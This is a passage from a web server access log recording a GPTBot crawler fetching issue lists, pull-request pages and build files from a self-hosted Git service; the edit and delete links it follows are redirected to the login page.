+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:32:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:18:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:18:32:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:18:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:18:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:18:32:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:18:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:18:32:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:18:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:18:32:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:18:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:18:32:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:18:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:18:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 9821] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:18:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 9821] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:18:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 9821] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:18:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:18:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:18:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:18:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:18:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:18:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:18:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9830] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:18:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:18:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:18:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:18:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.45] 